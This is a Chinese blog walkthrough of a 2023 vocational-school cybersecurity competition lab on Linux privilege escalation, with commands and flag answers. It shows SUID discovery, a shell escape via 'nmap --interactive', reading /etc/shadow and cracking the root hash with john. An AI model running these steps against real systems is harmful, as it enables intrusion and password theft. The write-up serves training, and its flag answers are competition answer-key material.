码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 2023年中职“网络安全“—Linux系统渗透提权③


    2023年中职"网络安全"—Linux系统渗透提权③

    • Linux系统渗透提权
      • 任务环境说明:
        • 1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
        • 2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
        • 3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
        • 4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
        • 5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
        • 6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

    Linux系统渗透提权

    任务环境说明:

    • 服务器场景:Server2202(关闭链接)
    • 用户名:hacker密码:123456

    1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

    nmap -p- -sV -T4 -n 靶机IP
    # -p- 全部端口
    # -sV 版本探测
    # -T4 针对TCP端口禁止动态扫描延迟超过10ms
    # -n 不做DNS解析
    
    • 1
    • 2
    • 3
    • 4
    • 5


    flag: 22/tcp

    2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

    uname -a            # 输出操作系统信息
    
    • 1


    flag: Kiowizity

    3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

    uname -a            # 输出操作系统信息
    
    • 1


    flag: 3.13.0-45-generic

    4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

    ls /root
    cat /root/adftutij.txt
    
    • 1
    • 2


    flag: hyjufk983

    5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

    find / -perm -u=s -type f 2>/dev/null
    # find 查找命令
    # / 从根目录开始
    # -perm 查找权限
    # -u=s 有suid权限的文件
    # -type 文件类型
    # -f 普通文件
    # 2 标准错误输出
    # > 输
    # /dev/null 空设备文件
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10

    nmap --interactive        # 进入nmap交互模式
    !sh                       # 执行sh
    id                        # 查看id
    cat /etc/shadow           # shadow 文件保存密码
    
    • 1
    • 2
    • 3
    • 4

    vim hash        # 把root信息行写入进去
    cat hash        # 查看是否赋值成功
    john hash       # 破解hash
    
    • 1
    • 2
    • 3


    flag: 0987654321

    6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

    pwd                                # 查看当前目录
    copy /root/flag.jpg flag.jpg       # 复制过来
    python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务
    
    • 1
    • 2
    • 3

    注意一定要加:8080 指定HTTP端口
    
    • 1


    flag: 2022_year_Skill_competition

  • 相关阅读:
    C#中的委托
    如何用AI帮你下载安卓源码
    目标检测——3D玩具数据集
    他因“上帝粒子”获诺奖,却火速搬到乡下:它毁了我的生活
    Spring 事务处理流程源码浅析(一)
    【VSS版本控制工具】
    C#程序变量统一管理例子 - 开源研究系列文章
    【支付漏洞】
    Thread线程类基本使用(上)
    Linux系统编程:makefile以及文件系统编程
  • 原文地址:https://blog.csdn.net/weixin_57060854/article/details/134453089
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号